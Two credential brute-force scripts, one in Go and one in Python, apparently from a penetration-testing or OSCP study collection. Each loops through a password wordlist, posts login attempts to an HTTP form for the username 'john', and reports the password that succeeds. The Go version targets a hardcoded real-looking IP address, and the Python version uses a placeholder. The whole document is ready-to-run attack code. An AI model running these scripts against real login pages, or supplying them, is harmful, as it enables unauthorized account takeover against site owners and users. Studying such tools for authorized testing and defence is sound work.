File: Web Security/Brute Force HTTP Form Login/bruteforce.go
package main

import (
	"bufio"
	"fmt"
	"io"
	"net/http"
	"net/url"
	"os"
	"strings"
	"time"
)

func main() {
	target := "http://136.110.43.120"
	username := "john"
	passwordFile := "passwords.txt"

	file, err := os.Open(passwordFile)
	if err != nil {
		fmt.Printf("Error opening password file: %v\n", err)
		return
	}
	defer file.Close()

	scanner := bufio.NewScanner(file)
	attemptCount := 0

	fmt.Printf("[*] Starting brute force attack against %s\n", target)
	fmt.Printf("[*] Target username: %s\n", username)
	fmt.Printf("[*] Password wordlist: %s\n\n", passwordFile)

	for scanner.Scan() {
		password := strings.TrimSpace(scanner.Text())
		if password == "" {
			continue
		}

		attemptCount++
		fmt.Printf("[%d] Trying password: %s... ", attemptCount, password)

		if tryLogin(target, username, password) {
			fmt.Printf("\n\n[+] SUCCESS! Valid credentials found:\n")
			fmt.Printf("[+] Username: %s\n", username)
			fmt.Printf("[+] Password: %s\n", password)
			return
		} else {
			fmt.Printf("Failed\n")
		}

		time.Sleep(100 * time.Millisecond)
	}

	if err := scanner.Err(); err != nil {
		fmt.Printf("Error reading password file: %v\n", err)
	}

	fmt.Printf("\n[-] Brute force complete. No valid credentials found.\n")
}

func tryLogin(target, username, password string) bool {
	client := &http.Client{
		Timeout: 10 * time.Second,
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}

	data := url.Values{}
	data.Set("username", username)
	data.Set("password", password)

	resp, err := client.PostForm(target, data)
	if err != nil {
		return false
	}
	defer resp.Body.Close()

	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return false
	}

	bodyStr := string(body)

	if resp.StatusCode == 302 || resp.StatusCode == 301 {
		return true
	}

	if strings.Contains(strings.ToLower(bodyStr), "success") ||
		strings.Contains(strings.ToLower(bodyStr), "welcome") ||
		strings.Contains(strings.ToLower(bodyStr), "dashboard") ||
		strings.Contains(strings.ToLower(bodyStr), "logged in") {
		return true
	}

	if !strings.Contains(strings.ToLower(bodyStr), "invalid") &&
		!strings.Contains(strings.ToLower(bodyStr), "incorrect") &&
		!strings.Contains(strings.ToLower(bodyStr), "failed") &&
		!strings.Contains(strings.ToLower(bodyStr), "wrong") {
		if len(bodyStr) < 500 || strings.Contains(bodyStr, "logout") {
			return true
		}
	}

	return false
}

File: OSCP-Organized/6-Tools-Scripts/bruteforce.py
#!/usr/bin/env python3

import requests
from requests.auth import HTTPBasicAuth
import sys
import time

def try_login(target, username, password):
    try:
        data = {
            'username': username,
            'password': password
        }
        
        response = requests.post(target, data=data, allow_redirects=False, timeout=10)
        
        if response.status_code in [301, 302]:
            return True
        
        body = response.text.lower()
        
        if any(keyword in body for keyword in ['success', 'welcome', 'dashboard', 'logged in']):
            return True
        
        if not any(keyword in body for keyword in ['invalid', 'incorrect', 'failed', 'wrong']):
            if len(body) < 500 or 'logout' in body:
                return True
        
        return False
    except Exception as e:
        return False

def main():
    # Configuration: Update these variables with your target
    target = "http://[TARGET_IP]"  # Replace with actual target
    username = "john"               # Replace with actual username
    password_file = "passwords.txt"
    
    print(f"[*] Starting brute force attack against {target}")
    print(f"[*] Target username: {username}")
    print(f"[*] Password wordlist: {password_file}\n")
    
    try:
        with open(password_file, 'r') as f:
            passwords = [line.strip() for line in f if line.strip()]
    except Exception as e:
        print(f"Error reading password file: {e}")
        return
    
    attempt = 0
    for password in passwords:
        attempt += 1
        print(f"[{attempt}] Trying password: {password}... ", end='', flush=True)
        
        if try_login(target, username, password):
            print("\n")
            print(f"[+] SUCCESS! Valid credentials found:")
            print(f"[+] Username: {username}")
            print(f"[+] Password: {password}")
            return
        else:
            print("Failed")
        
        time.sleep(0.1)
    
    print(f"\n[-] Brute force complete. No valid credentials found.")

if __name__ == "__main__":
    main()
